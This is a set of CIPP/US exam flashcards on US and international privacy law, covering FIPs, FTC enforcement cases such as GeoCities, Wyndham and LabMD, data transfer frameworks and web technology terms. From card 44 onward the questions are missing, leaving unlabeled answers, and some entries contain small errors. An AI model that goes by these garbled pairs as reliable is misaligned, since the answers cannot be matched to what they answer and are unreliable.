CIPP / US Book Flashcards

Question 1

Q

Privacy has been defined as . . .

Answer

A

the desire of people to freely choose the circumstances and the degree to which individuals will expose their attitudes and behavior to others

Question 2

Q

4 Categories or classes of privacy and examples

Answer

A

Information privacy
- financial information, medical information, government records and records of a person’s activities on the Internet
Bodily privacy
- genetic testing, drug testing or body cavity searches, birth control, abortion and adoption
Territorial privacy
- video surveillance, ID checks, and use of similar technology and procedures
Communications privacy
- postal mail, telephone conversations, email, and other forms of communicative behavior and apparatus

Question 3

Q

Although the word privacy does not appear in the Constitution, a number of provisions relate to privacy, including:

Answer

A

The 3rd Amendment, banning quartering of soldiers in a person’s home
The 4th Amendment, generally requiring a search warrant before the police can enter a home or business
The 5th Amendment, prohibiting persons from being compelled to testify against themselves
The 14th Amendment, with its requirement of due process under the law, including for intrusions into a person’s bodily autonomy

Question 4

Q

Which state’s constitution has protection for privacy?

Answer

A

The California Constitution contains an explicit guarantee of the right to privacy, which the people of California added to the California Constitution by a ballot measure in November 1972

Question 5

Q

Universal Declaration of Human Rights with respect to privacy

Answer

A

The declaration formally announced that “no one shall be subjected to arbitrary interference with his privacy, family, home or correspondence.”

Question 6

Q

Fair Information Practices (FIPs) and its categories

Answer

A

Are guidelines for handling, storing and managing data with privacy, security and fairness in an information society that is rapidly evolving

4 categories: rights of individuals, controls on the information, information lifecycle, and management

Question 7

Q

Fair Informations Practices widely today date back to . . .

Answer

A

1973 report by the US Dept of Health, Education, and Welfare Advisory Committee on Automated System

Question 8

Q

What is the most widely recognized framework for FIPs and have been endorsed by the Federal Trade Commission and many other government organizations?

Answer

A

OECD Guidelines

Question 9

Q

OECD Guidelines provide the following privacy framework

Answer

A

Collection principle
Use limitation principle
Purpose specification principle
Openness principle
Data quality principle
Individual participation principle
Accountability principle
Security safeguard principle

Question 10

Q

Who passed Convention 108?

Answer

A

In 1981, the Council of Europe passed the Convention for the Protection of Individuals with Regard to the Automatic Processing of Personal Data (“Convention 108”)

Question 11

Q

What did Convention 108 require member states to do?

Answer

A

This convention required member states of the Council of Europe that signed the treaty to incorporate certain data protection provisions into their domestic law

Question 12

Q

APEC

Answer

A

A multinational organization with 21 Pacific coast members in Asia and the Americas. Unlike the EU, the APEC organization operates under nonbinding agreement. It was established in 1989 to enhance economic growth for the region

Question 13

Q

APEC Privacy Principles

Answer

A

CUP N’ CIA SA

Collection limitation
Uses of personal information
Preventing harm
Notice
Choice
Integrity of personal information
Access and correction
Security safeguard
Accountability

Question 14

Q

Madrid Resolution

Answer

A

There were dual purposes for the Madrid Resolution: to define a set of principles and rights guaranteeing (1) the effective and internationally uniform protection of privacy with regard to the processing of personal data and (2) the facilitation of the international flows of personal data needed in a globalized world

Question 15

Q

In response to the scare of the scare of “Big Brother is watching” during 1970 and after George Orwell’s 1949 book 1984 . . .

Answer

A

In 1970 the German state of Hesse enacted the first known modern data protection law. This German law was motivated in part by the growing potential of IT systems as well as a desire to prevent a reoccurrence of the personal information abuses that took place under Hitler’s Third Reich before and during World War II
The United States passed its first national privacy law in 1970, the Fair Credit Reporting Act, which focused solely on information about consumer credit

Question 16

Q

Personal information and personally identifiable information (PII)

Answer

A

Generally used to define the information that is covered by privacy laws
- Ex./ names, social security numbers or passport numbers.
The terms also include information about an “identified” or “identifiable” individual.
- Ex./ street address, telephone number, and email address are generally considered sufficiently related to a particular person to count as identifiable info within the scope of privacy protections

Question 17

Q

Sensitive personal information

Answer

A

The definition of what is considered sensitive varies depending on jurisdiction and particular regulations. In the United States, Social Security numbers and financial information are commonly treated as sensitive information, as are driver’s license numbers and health information

Question 18

Q

How can personal information become non-personal information?

Answer

A

If the data elements used to identify the individual are removed, the remaining data becomes nonpersonal information, and privacy and data protection laws generally do not apply. Similar terms used include de-identified or anonymized information

Question 19

Q

Example of how different regimes have defined the line between personal and nonpersonal information, consider the Internet protocol (IP) address, the numbers that identify the location of computers in communications over the Internet

Answer

A

The EU considers IP addresses “personal data,” taking the view that IP addresses are identifiable. A court in Ireland, however, determined that IP addresses did not constitute personal information. In the United States, federal agencies operating under the Privacy Act do not consider IP addresses to be covered by the statute

Question 20

Q

Public records

Answer

A

consist of information collected and maintained by a government entity and available to the public

Examples: real estate records in some jurisdictions contain detailed information about ownership, assessed value, amount paid for the parcel, taxes imposed on the parcel, and improvements

Question 21

Q

Publicly available information

Answer

A

Information that is generally available to a wide range of persons.

Examples: names and addresses in telephone books and information published in newspapers or other public media. Today, search engines are a major source of publicly available information

Question 22

Q

Nonpublic information

Answer

A

Not generally available or easily accessed due to law or custom

Examples: data are medical records, financial information and adoption records. A company’s customer or employee database usually contains nonpublic information

Question 23

Q

Data subject

Answer

A

(first widely used in the EU)
the individual about whom information is being processed, such as the patient at a medical facility, the employee of a company or the customer of a retail store

Question 24

Q

Data controller

Answer

A

An organization that has the authority to decide how and why personal information is to be processed. This entity is the focus of most obligations under privacy and data protection laws—it controls the use of personal information by determining the purposes for its use and the manner in which the information will be processed

The data controller may be an individual or an organization that is legally treated as an individual, such as a corporation or partnership

Question 25

Q

Data processor

Answer

A

An individual or organization, often a third-party outsourcing service, that processes data on behalf of the data controller. Under the Health Insurance Portability and Accountability Act(HIPAA) medical privacy rule, these data processors are called “business associates.”

Question 26

Q

Over time, countries have adopted comprehensive privacy and data protection laws for a combination of at least three reasons

Answer

A

Remedy past injustices
Ensure consistency with European privacy laws
Promote electronic commerce

Question 27

Q

co-regulatory model emphasizes . . .

Answer

A

Emphasizes industry development of enforceable codes or standards for privacy and data protection against the backdrop of legal requirements by the government. Co-regulation can exist under both comprehensive and sectoral models

Ex./ Children’s Online Privacy Protection Act in the United States

Question 28

Q

Self-regulatory model emphasizes . . .

Answer

A

Emphasizes creation of codes of practice for the protection of personal info by a company, industry or independent body
In contrast to the co-regulatory model, there may be no generally applicable data protection law that creates a legal framework for the self-regulatory code

Examples: Payment Card Industry Data Security Standard (PCI-DSS), seal programs

Question 29

Q

CAN SPAM provides the FTC and the FCC with the authority to . . .

Answer

A

CAN-SPAM provides the FTC and the FCC with the authority to issue regulations that set forth exactly how the opt-out mechanism must be offered and managed

Question 30

Q

CAN-SPAM Act

Answer

A

Requires the senders of commercial email messages to offer an “opt-out” option to recipients of these messages

Question 31

Q

What purposes does notice have?

Answer

A

Notices have two purposes: (1) consumer education and (2) corporate accountability

Question 32

Q

Opt-in example

Answer

A

“May we share your information?” Failure to answer would result in the information not being shared

Question 33

Q

Opt out example

Answer

A

If a company states “unless you tell us not to, we may share your information,” the person has the ability to opt out of the sharing by saying no. Failure to answer would result in the information being shared

Question 34

Q

FTC has general and specific authority in . . .

Answer

A

The FTC has general authority to enforce against unfair and deceptive trade practices, notably including the power to bring “deception” enforcement actions where a company has broken a privacy promise.

In certain areas, such as marketing communications and children’s privacy, the FTC has specific regulatory authority

Question 35

Q

Federal agencies that have regulatory authority over particular sectors

Answer

A

Federal banking regulatory agencies (such as the Consumer Financial Protection Bureau, Federal Reserve, and Office of the Comptroller of the Currency), the FCC, the U.S. Department of Transportation, and the U.S. Department of Health and Human Services, through its Office of Civil Rights

Question 36

Q

Examples of self-regulatory regimes

Answer

A

Network Advertising Initiative
The Direct Marketing Association
The Children’s Advertising Review Unit

Question 37

Q

6 questions to ask to understand laws

Answer

A

Who is covered by this law?
What types of information (and what uses of information) are covered?
What exactly is required or prohibited?
Who enforces the law?
What happens if I don’t comply?
Why does this law exist?

Question 38

Q

California SB 1386 - Who is Covered?

Answer

A

Entities that do business in California and that own or license computerized data, including personal info. It applies to natural persons, legal persons and gov’t agencies.
Companies in MN or NY don’t count (altho they may wish to be careful about what counts as “doing business”), even if they conduct business in CA, it doesn’t count if they don’t have computerized data

Question 39

Q

California SB 1386 - What types of information (and what uses of information) are covered?

Answer

A

Regulates the computerized personal information of CA. “Personal information” is an individual’s name in combination with any one or more of the following: (1) Social Security number; (2) California identification card number; (3) driver’s license number; or (4) financial account, credit, or debit card number in combination with security code, access code or password information required to permit access to an individual’s financial account, when either the name or the data elements are NOT ENCRYPTED

Question 40

Q

California SB 1386 - What exactly is required or prohibited?

Answer

A

Requires all persons to disclose any breach of system security to any resident of California whose unencrypted personal info was or is reasonably believed to have been acquired by an unauthorized person
A breach of the security of the system means unauthorized acquisition of computerized data that compromises the security, confidentiality or integrity of personal info maintained by the person
Disclosure must be made in as expedient a manner as possible.

Exceptions: good faith acquisition of personal information by an employee or agent of the business, provided the personal information is not used or subject to further unauthorized disclosure

Question 41

Q

California SB 1386 - Who enforces the law?

Answer

A

The California attorney general enforces the law, and there is a private right of action

Question 42

Q

California SB 1386 - What is the consequence for noncompliance?

Answer

A

The California attorney general or any citizen can file a civil lawsuit against a noncompliant party seeking damages and forcing compliance

Question 43

Q

California SB 1386 - Why does this law exist?

Answer

A

SB 1386 was enacted because security breaches of computerized databases are feared to cause identity theft—and individuals should be notified about these breaches so they can take steps to protect themselves. Anyone with a security breach that puts people at real risk of identity theft should consider notifying them even if they are not subject to this law

Question 44

Q

True or false? The Fair Credit Reporting Act (FCRA), for instance, has a private right of action, allowing individuals to sue a company if their consumer reports have been used inappropriately

Question 45

Q

Administrative enforcement actions

Answer

A

Are carried out pursuant to the statutes that create and empower an agency, such as the FTC and the FCC

Question 46

Q

Why was the FTC founded?

Answer

A

The FTC was founded in 1914 to enforce antitrust laws, and its general consumer protection mission was established by a statutory change in 1938.
The FTC navigates both roles today, and privacy and computer security issues have become an important part of its work.
The FTC is an independent agency instead of falling under the direct control of the president

Question 47

Q

U.S. Department of State with respect to privacy internationally

Answer

A

Has been increasingly active over time on privacy, especially by negotiating internationally on privacy issues with other countries and in multinational groups such as the United Nations or the Organization for Economic Co-operation and Development (OECD)

Question 48

Q

U.S. Department of Commerce with respect to privacy internationally

Answer

A

Plays a leading role in federal privacy policy development and administers the Privacy Shield Framework between the United States and the EU

Question 49

Q

U.S. Department of Transportation with respect to privacy internationally

Answer

A

The agency responsible for transportation companies under its jurisdiction and for enforcing violations of the Privacy Shield Framework between the U.S. and the EU for some transportation companies.
Within DOT, the Federal Aviation Administration (FAA) has recently played an increasing role for drones.
The National Highway Traffic Safety Administration (NHTSA), also within DOT, addresses privacy and security issues for connected cars

Question 50

Q

U.S. Office of Management and Budget with respect to privacy

Answer

A

The lead agency for interpreting the Privacy Act of 1974, which applies to federal agencies and private-sector contractors to those agencies. The OMB also issues guidance to agencies and contractors on privacy and information security issues, such as data breach disclosure and privacy impact assessments

Question 51

Q

U.S. Department of Homeland Security

Answer

A

Faces numerous privacy issues, such as the E-Verify program for new employees, rules for air traveler records (Transportation Security Administration), as well as immigration and other border issues (Immigration and Customs Enforcement)

Question 52

Q

FTC has general authority in theory to issue regulations to implement protections against unfair and deceptive acts and practices, which are promulgated under

Answer

A

Any such regulation must comply with the complex and lengthy procedures under the Magnuson-Moss Warranty Federal Trade Commission Improvement Act of 1975.
As of the date of writing, the FTC had not put forth any privacy or information security regulation under its Magnuson-Moss authority

Question 53

Q

FTC step 1: The FTC has broad investigatory authority . . .

Answer

A

The FTC has broad investigatory authority, including the authority to subpoena witnesses, demand civil investigation and require businesses to submit written reports under oath

aka Step 1 of FTC action

Question 54

Q

Step 2 - FTC: Following an investigation . . .

Answer

A

The commission may initiate an enforcement action if it has reason to believe a law is being or has been violated

Question 55

Q

Step 3 - FTC: The commission issues a complaint, and . . .

Answer

A

An administrative trial can proceed before an ALJ. If a violation is found, the ALJ can enjoin the company from continuing the practices that caused the violation

Question 56

Q

How do appeals work after an investigation in the FTC?

Answer

A

The decision of the ALJ can be appealed to the five commissioners. That decision, in turn, can be appealed to federal district court

Question 57

Q

Both the company and the FTC have incentives to negotiate a consent decree rather than proceed with a full adjudication process

Answer

A

Company: avoids a prolonged trial, negative ongoing publicity, avoids having the details of its business practices exposed to the public

FTC: (1) achieves a consent decree that incorporates good privacy and security practices, (2) avoids the expense and delay of a trial and (3) gains an enforcement advantage because monetary fines are much easier to assess in federal court if a company violates a consent decree than if no decree is in place

Question 58

Q

What is the FTC’s sunset policy?

Answer

A

Under the FTC’s “Sunset Policy,” administrative orders such as consent decrees are imposed for up to 20 years

Question 59

Q

What used to happen before the FTC began using consent decrees?

Answer

A

Its Bureau of Consumer Protection negotiated such decrees for other consumer protection issues such as false advertising or unfair debt collection practices under Section 5 of the FTC Act

Question 60

Q

In the Matter of GeoCities, Inc

Answer

A

GeoCities operated a website that provided an online community through which users could maintain personal home pages. Users were required to fill out an online form that requested certain personal info, w/ which Geocities created an extensive info database.
Geocities promised on its website that the collected info would not be sold or distributed w/o user consent
FTC alleged GeoCities misrepresented how it would use info collected from its users by reselling the info to 3rd parties, which violated its privacy notice
GeoCities settled the action and the FTC issued a consent order&raquo_space; required GeoCities to post and adhere to a conspicuous online privacy notice that disclosed to users how it would collect and use personal info

Question 61

Q

The FTC brought an enforcement action against Eli Lilly and Company, what was that about?

Answer

A

Eli Lilly and Company (pharmaceutical manufacturer) maintained a website where users could provide personal info for messages and updates reminding them to take their medication
The website included a privacy notice that made promises about the security and privacy of the info provided
Eli Lilly decided to end the program&raquo_space; sent subscribers an email announcement&raquo_space; accidentally revealed the email addresses of all subscribers
FTC and Eli Lilly reached a settlement&raquo_space; required Eli Lilly to adhere to representations about how it collects, uses, and protects user info
It required, for the first time in an online privacy and security case, that Eli Lilly develop and maintain an information privacy and security program

Question 62

Q

What is required for a practice to be considered “deceptive”?

Answer

A

For a practice to be deceptive, it must involve a material statement or omission that is likely to mislead consumers who are acting reasonably under the circumstances

Question 63

Q

What are some examples of deceptive practices?

Answer

A

False promises
Misrepresentations
Failures to comply with representations made to consumers, such as statements in privacy policies and Safe Harbor or Privacy Shield certifications

Question 64

Q

In the Matter of Nomi

Answer

A

Nomi provided a service to brick-and-mortar businesses whereby Nomi placed sensors in these retail businesses to detect the MAC addresses of mobile devices that are searching for Wi-Fi service
Nomi used the info that it collected to provide analytics reports to its business clients about their customers’ retail traffic patterns
According to the FTC, Nomi misled consumers about the ability to opt out of their service and failed to inform these consumers about the location of stores where the tracking was taking place.
The consent order that Nomi entered into w/ the FTC restricted the company from continuing to engage in these business practices for 20 years

Answer 64

A

Snapchat promised its customers that its app provided a private, short-lived messaging service
The consumer set a timer for the snap to be viewed, and after that time expired the snap disappeared “forever.”
Snapchat’s app included a feature to “Find Friends” that appeared to the user as the only means to choose to provide info to the company about individuals the user knew.
According to the FTC, Snapchat was aware of numerous methods that could be employed to save chats indefinitely, and it was actually collecting the names and phone numbers of all contacts in the user’s mobile device address book&raquo_space; Snapchat failed to adequately secure the Find Friends feature.
Because of the lax security measures, hackers managed to compile a database of millions of user names and phone numbers and subjected these individuals to spam, phishing, and other unsolicited communications.
Snapchat entered into a consent order w/ the FTC in 2014 agreeing that it would not engage in these business practices for the next 20 yrs

Answer 65

A

TRUSTe, Inc. (now doing business as TrustArc) is a business that provides certifications to companies regarding privacy issues.
The business has provided a seal to companies that have privacy practices in compliance with standards such as COPPA and the U.S.-EU Safe Harbor Framework.
According to the FTC, TRUSTe failed to conduct annual recertifications in more than 1,000 instances from 2006 to Jan 2013, despite claiming to conduct recertifications every year on its website
In the settlement agreement w/ FTC, TRUSTe was required to maintain comprehensive records for 10 yrs related to its certifications and to pay a $200,000 civil penalty

Answer 66

A

Unfair claims can exist even where the company has not made any deceptive statements if the injury is substantial, lacks offsetting benefits, and cannot be easily avoided by consumers

Answer 67

A

The FTC has sanctioned companies for unfair practices when they failed to implement adequate protection measures for sensitive personal information or when they provided inadequate disclosures to consumers.

In 2015, the federal appellate court determined that the company does not act appropriately “when it publishes a privacy policy to attract customers who are concerned about data privacy, fails to make good on that promise by investing inadequate resources in cybersecurity, exposes its unsuspecting customers to substantial financial injury, and retains the profits for their business. (“FTC v. Wyndham Worldwide Corp.).

Answer 68

A

Wyndham Worldwide Corporation, a hotel company that suffered three hacks to its systems from 2008 to 2009&raquo_space; FTC investigated Wyndham for unfair and deceptive trade practices&raquo_space; FTC asserted that Wyndham:
- Stored credit card info in unencrypted text
- Permitted passwords for property management systems to be easily guessable
- Failed to use firewalls between individual hotels, corporate systems and theInternet
- Allowed out-of-date operating systems to run on property management systems and failed to update these computers w/ timely security updates
- Failed to adequately control computer access by 3rd-party vendors
- Did not have unauthorized access detection measures in place
- Failed to add security measures after they suffered known breaches
FTC sought to sanction&raquo_space; Wyndham initially chose not to settle the case. In 2012, the FTC filed suit against the company in U.S. District Court. Wyndham challenged the FTC’s authority to require the company to meet more than the minimum standards set forth in the FTC Act, Sec 5&raquo_space; Dist Ct ruled for the FTC&raquo_space; 3d Cir. Ct affirmed for the FTC, the FTC’s longstanding authority to regulate “unfair methods of competition in or affecting commerce” under the FTC Act Sec 5 extended to regulation of cyberspace practices that are harmful to consumers

Answer 69

A

LabMD was significantly hacked on two separate occasions in 2009 and 2012.
According to the FTC’s complaint, sensitive patient info for thousands of LabMD customers was taken in the 1st hack and placed on a peer-to-peer file-sharing network. Info included names, Social Security numbers, birth dates, health insurance provider info, and standardized medical treatment codes
LabMD was hacked a 2nd time&raquo_space; at least 500 customer names and Social Security numbers being found in the possession of identity thieves
FTC brought an enforcement action under FTC Act, Sec 5 claiming that LabMD engaged in unfair trade practices by failing to take appropriate measures to prevent unauthorized disclosure of sensitive data on its network
Rather than enter into a consent order w/ FTC, LabMD chose to proceed w/ an administrative hearing before an ALJ

Answer 70

A

LifeLock case illustrates the ongoing consequences for a company operating under an FTC consent decree
In 2006, LifeLock began an advertising campaign claiming that it could prevent all identity theft in exchange for consumers paying a monthly fee for its services.
Prominent in the LifeLock ads was the Social Security number of the company’s CEO.
In 2010 FTC enforcement action against the company, asserting LifeLock’s business practice was deceptive because its approach to protecting customers against identity theft addressed only certain forms of identity theft.
FTC alleged that LifeLock failed to encrypt its customers’ data or to properly restrict access to data held by the company, putting the data it held at risk

Answer 71

A

DesignerWare case illustrated FTC unfairness concerns that go beyond data breach
DesignerWare licensed software to rent-to-own companies to help them track and recover rented computers&raquo_space; the software could log keystrokes, capture screenshots, and take photographs using a computer’s webcam
Data gathered by DesignerWare and provided to rent-to-own stores revealed sensitive info about computer users: user names and passwords; Social Security numbers; medical and financial records; and webcam pictures of children, partially undressed individuals, and intimate activities.
DesignerWare used geolocation tracking software w/o obtaining permission of the computer users and presented a fake software program registration screen on the users’ computer that tricked individuals into providing their personal contact info.
FTC alleged that DesignerWare and 7 rent-to-own companies involved engaged in unfair practices of surreptitiously collecting webcam photos and consumer info and inappropriately using geolocation info, and the deceptive practice of using fake software registration&raquo_space; consent order entered into w/ FTC, the companies agreed not to engage in these practices for 20 yrs

Answer 72

A

IRS TAFA

Individual control
Respect for context
Security
Transparency
Access and accuracy
Focused collection
Accountability

Answer 73

A

Privacy by design
Simplified consumer choice
Transparency

Answer 74

A

Do not track mechanism
Mobile
Data brokers
large platforms providers
Promotion of enforceable self-regulatory codes

Answer 75

A

ASUS failed to address security issues with routers, and hackers exploited these security flaws to gain unauthorized access to the storage units of 12,900 customers.
TRENDnet failed to secure live video feeds from 700 customers, allowing hackers to post links to these live video feeds.

Answer 76

A

Yes. Plaintiffs can sue under the privacy torts, which traditionally have been categorized as intrusion upon seclusion, appropriation of name or likeness, publicity given to private life, and publicity placing a person in false light

Answer 77

A

Failure to comply can lead exclusion from Visa, MasterCard or other major payment card systems, as well as penalties of $5,000 to $100,000 per month

Answer 78

A

Third-party privacy seal and certification programs play an important role in providing assurances that companies are complying with self-regulatory programs

Answer 79

A

A coalition of media and advertising organizations. The DAA helped develop an icon program, intended to inform consumers about how they can exercise choice with respect to online behavioral advertising. The AdChoices system allows users to click on an icon near an ad or to visit the AdChoices website and choose to what extent the user will view behavioral ads from participating advertisers

Answer 80

A

Discuss the practical aspects of privacy law enforcement cooperation
Share best practices in addressing cross-border challenges
Work to develop shared enforcement priorities
Support joint enforcement initiatives and awareness campaigns

Answer 81

A

In response to the recommendation, the FTC, along with enforcement authorities from around the world, established the Global Privacy Enforcement Network (GPEN) in 2010

Answer 82

A

GPEN aims to promote cross-border information sharing as well as investigation and enforcement cooperation among privacy authorities around the world

Answer 83

A

Aims to establish a framework for participating members to share information and evidence in cross-border investigations and enforcement actions in the Asia-Pacific region

Answer 84

A

legal risks
reputational risks
operational risks
investment risks

Answer 85

A

Discover
- Issue identification and self-assessment
- Determination of best practices
Build
- Procedure development and verification
- Full implementation
Communicate
- Documentation
- Education
Evolve
- Affirmation and monitoring
- Adaptation

Answer 86

A

This inventory should include both customer and employee data records. It should document data location and flow as well as evaluate how, when and with whom the organization shares such information—and the means for data transfer used. This sort of inventory is legally required for some institutions, such as those covered by the Gramm-Leach-Bliley Act (GLBA) Safeguards Rule. The benefits of the inventory apply more generally, because it identifies risks that could affect reputation or legal compliance

Answer 87

A

Defines the clearance of individuals who can access or handle that data, as well as the baseline level of protection appropriate for that data.
Most orgs handle different types of PI, such as personnel and customer records, as well as other info the orgs treats as sensitive, such as trade secrets and business plans
In the U.S., classification is often important for compliance purposes because of sector-specific privacy and security laws

Answer 88

A

An organization chart can be useful to help map and document the systems, applications and processes for handling data. Documenting data flows helps identify areas for compliance attention

Answer 89

A

Some helpful questions for privacy professionals when doing due diligence and for an organization to consider as it addresses privacy risks:

LSEWHU

Where, how and for what length of time is the data stored?
How sensitive is the info?
Should the info be encrypted?
Will the info be transferred to or from other countries, and if so, how will it be transferred?
Who determines the rules that apply to the info?
How is the information to be processed, and how will these processes be maintained?
Is the use of such data dependent upon other systems?

Answer 90

A

One policy will work if an organization has a consistent set of values and practices for all its operations. Multiple policies may make sense for a company that has well-defined divisions of lines of business, especially if each division uses customer data in very different ways, does not typically share PI with other divisions, and is perceived in the marketplace as a different business

Answer 91

A

If the policy is not strict enough, then consumers, regulators, and the press may criticize the company for its failure to protect privacy.

Answer 92

A

If a policy is too strict, then open-ended statements or overly ambitious security promises can result in legal penalties or reputational problems if the organization cannot satisfy its promises

Answer 93

A

If a privacy policy is revised, the organization should announce the change first to employees, then to both current and former customers through its privacy notice. The FTC stated that a “material” change “at a minimum includes sharing consumer information with third parties after committing at the time of collection not to share the data.

Answer 94

A

Make the notice accessible online
Make the notice accessible in places of business
- Clearly post the organization’s privacy notice at the location of business in areas of high customer traffic and in legible form
- Organization staff also should have ready access to copies of the up-to-date company privacy policy in case a customer wishes to obtain a copy for review.
Provide updates and revisions
Ensure that the appropriate personnel are knowledgeable about the policy

Answer 95

A

COPPA, HIPAA, FCRA

Answer 96

A

The 2010 preliminary FTC staff report, “Protecting Consumer Privacy in an Era of Rapid Change,” called these situations “commonly accepted practices.” In such situations, an organization has been given implied authority to share PI

Answer 97

A

This privacy notice creates an enforceable promise. If an individual sells the information for individuals who have opted out, the FTC or state enforcers may bring suit under the unfair and deceptive trade practices laws

Answer 98

A

The Video Privacy Protection Act requires an opt-out before covered movie and other rental data is provided to a third party

Answer 99

A

The CAN-SPAM Act requires email marketers to provide an opt-out

Answer 100

A

GLBA requires an opt-out before transferring the PI of a customer of a financial institution to an unaffiliated third party for the latter’s own use

Answer 101

A

Opt-outs are required for companies that subscribe to any of a number of self-regulatory systems.

Ex./ the Data and Marketing Association has long operated an opt-out system for consumers who do not wish to receive commercial mail sent to their homes, the Network Advertising Initiative, TrustArc, and the Digital Advertising Alliance operate opt-out systems in connection with online advertising

Answer 102

A

The scope of an opt-out can vary
The mechanism for providing an opt-out or another user preferences can also vary
Linking a user’s interactions through multiple channels, including in person, by phone, by email or by web, can be a management challenge when customers interact with an organization
The time period for implementing user preferences is sometimes provided by law
Third-party vendors often process PI on behalf of the company that has the customer relationship

Answer 103

A

Individuals have the right to access their credit reports under FCRA and rectify incorrect data

Answer 104

A

Patients can access their medical records under HIPAA, with records that the patient believes are incorrect noted as such in the patient files

Answer 105

A

Confidentiality provision
No further use of shared information
Use of subcontractors
Requirement to notify and to disclose breach
Information security provisions

Answer 106

A

Reputation
Financial condition and insurance
Information security controls
Point of transfer
Disposal of information
Employee training and awareness
Vendor incident response
Audit rights

Answer 107

A

(1) notification of security breaches,
(2) new requirements for processors (contractors who act on behalf of data controllers),
(3) designation of data protection officers,
(4) accountability obligations,
(5) rules for international transfers and
(6) sanctions of up to 4 percent of worldwide revenues

Answer 108

A

European Court of Justice struck down the Safe Harbor program in significant part based on U.S. government surveillance concerns raised by the 2013 Snowden disclosures

Answer 109

A

(1) The Privacy Shield Framework,
(2) Standard Contract Clauses (SCCs) and
(3) Binding Corporate Rules (BCRs)

Answer 110

A

(1) commitments by U.S. companies, (2) detailed explanations of U.S. laws, and (3) commitments by U.S. authorities.

U.S. companies wishing to import personal data from the EU under the Privacy Shield accept obligations on how that data can be used, and those commitments are legally binding and enforceable.

Answer 111

A

Are an additional basis for transferring data, providing that a multinational company can transfer data between countries after certification of its practices by an EU privacy supervisory agency

Answer 112

A

The legality of SCCs has been challenged in the EU, again based largely on the fact that the U.S. government can conduct national security surveillance on data that enters the country.
At the time of this writing, the case has been referred to the EU’s highest court, the European Court of Justice, to determine whether SCCs may be used to transfer data to the United States

Answer 113

A

ARPAnet, a military computer network developed in the early 1960s by the U.S. Advanced Research Projects Agency (ARPA)

Answer 114

A

Hypertext transfer protocol (HTTP)

2. Hypertext markup language (HTML)

Answer 115

A

An application protocol that manages data communications over the Internet, defines how messages are formatted and transmitted over a TCP/IP network (defined below) for websites. Further, it defines what actions web servers and web browsers take in response to various commands.

Answer 116

A

A content-authoring language used to create web pages
The web browser interprets the HTML markup language within a web page to determine how the content on the page should be rendered
Document “tags” can be used to format and lay out a web page’s content and to “hyperlink”—connect dynamically—to other web content
Forms, links, pictures and text may all be added with minimal commands. Headings are also embedded into the text and are used by web servers to process commands and return data with each request

Answer 117

A

Allows the transfer of data from a browser to a website over an encrypted connection. By early 2016, HTTPS traffic became greater than HTTP traffic

Answer 118

A

5th and most recent version of the HTML standard

New capabilities and features: the ability to run video, audio, and animation directly from websites w/o the need for a plug-in (a piece of software that runs in the browser and renders media such as audio or video)
It had significant implications for the rapidly expanding mobile ecosystem, as many mobile devices do not support Flash (discussed further below).
Features: increases security, the ability to store information offline, in web applications that can run when not connected to the Internet

Answer 119

A

Another language that facilitates the transport, creation, retrieval and storage of documents. Like HTML, XML uses tags to describe the contents of a web page or file. HTML describes the content of a web page in terms of how it should be displayed. Unlike HTML, XML describes the content of a web page in terms of the data that is being produced, enabling automatic processing of data in large volumes and necessitating attention to privacy issues

Answer 120

A

The address of documents and other content that are located on a web server. An example of a URL is “https://iapp.org.” This URL contains: (1) an HTTPS prefix to indicate its use of the protocol; “www” to signify a location on the World Wide Web, (3) a domain name (e.g., “iapp”) and (4) an indicator of the top-level domain (e.g., “com” for a commercial organization, “org” for an organization,“gov” for government,“edu” for an educational institution, or a two-letter country code, such as “uk” for United Kingdom or “jp” for Japan).

Answer 121

A

Used to connect an end user to other websites, parts of websites, and/or web-enabled services. The URL of another site is embedded in the HTML code of a site so that when a user clicks on the link in the web browser, the end user is transported to the destination website or page

Answer 122

A

A computer that is connected to the Internet, hosts web content and is configured to share that content. Documents that are viewed on the web are actually located on individual web servers and accessed by a browser

Answer 123

A

An intermediary server that provides a gateway to the web
Employee access to the web often goes through a proxy server
A proxy server typically masks what is happening behind the org’s firewall, so that an outside website sees only the IP address and other characteristics of the proxy server, and not detailed info about which part of an organization is communicating with the outside website

Answer 124

A

Are an important category of proxy server, widely used in the United States for employee web access, but not nearly as widely used by consumers. VPNs encrypt the information from the user to the organization’s proxy server, thus masking from the ISP both the content and web destinations of that user

Answer 125

A

Occurs when web browsers and proxy servers save a local copy of the downloaded content, reducing the need to download the same content again from the web server. To protect privacy, pages that display personal information should be set to prohibit caching

Answer 126

A

Sometimes automatically created when a visitor requests a web page. Ex./ of the information automatically logged include the IP address of the visitor, the date and time of the web page request, the URL of the requested file, the URL visited immediately prior to the web page request, and the visitor’s web browser type and computer operating system

Answer 127

A

Specifies the format of data packet that travels over the Internet and also provides the appropriate addressing protocol. An IP address is a unique number assigned to each connected device—it is similar to a phone number because the IP address shows where data should be sent from the website

Answer 128

A

Often assigns a new IP address on a session-by-session basis. When the IP address used by an individual thus shifts with each session, this approach is referred to as a “dynamic” IP address. Conversely, “static” IP addresses have become more common in recent years. A static IP address remains the same over time for a particular device. In such cases, a website can use the static IP address as a way to recognize a device that returns to the site

Answer 129

A

Enables two devices to establish a stream-oriented reliable data connection. A combination of TCP and IP is used to send data over the Internet. Data is sent in the form of packets, which contain message content and a header that specifies the destination of the packet.

Answer 130

A

A protocol that ensures privacy between a user and a web server.
When a server and client communicate, TLS secures the connection to ensure that no 3rd party can eavesdrop on or corrupt the message
TLS is a successor to secure sockets layer (SSL)

Answer 131

A

A scripting language used to produce a more interactive and dynamic website. Javascript has vulnerabilities and problems interacting with some programs and systems. A common malicious practice is cross-site scripting (XSS). Simple additions to coding such as an infinite loop can overwhelm the memory and impose a denial of service attack. Information security professionals should examine the risks that can arise from the use of Javascript

Answer 132

A

The language used to describe the presentation of web pages. This includes colors, layout and font. This language allows for adaptation of the web page to different types of devices. CSS and HTML are independent of each other

Answer 133

A

A bandwidth-friendly interactive animation and video technology that has been widely used to enliven web pages and advertisements. Compatibility and security problems, however, have led to a decrease in use. Some security experts now discourage users from installing Flash. As HTML5 becomes more widely adopted, and as the mobile computing environment grows, use of external plug-ins such as Flash may diminish. As of the writing of this book, Flash is used in less than 10 percent of websites

Answer 134

A

Emails or other communications that are designed to trick a user into believing that he or she should provide a password, account number or other information. The user then typically provides that information to a website controlled by the attacker.

Ex./ These emails or websites appear to originate from legitimate organizations—such as recognized banks or retailers—and may include seemingly legitimate trademarks, colors, logos or other corporate signatures

Answer 135

A

A phishing attack that is tailored to the individual user, for example, when an email appears to be from the user’s boss instructing the user to provide information

Ex./ the message may appear to come from the recipient’s coworker, or from someone who has recently been in a meeting with the recipient.

Answer 136

A

